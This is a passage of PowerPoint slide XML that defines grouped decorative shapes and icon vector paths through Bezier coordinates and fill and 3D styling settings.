                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
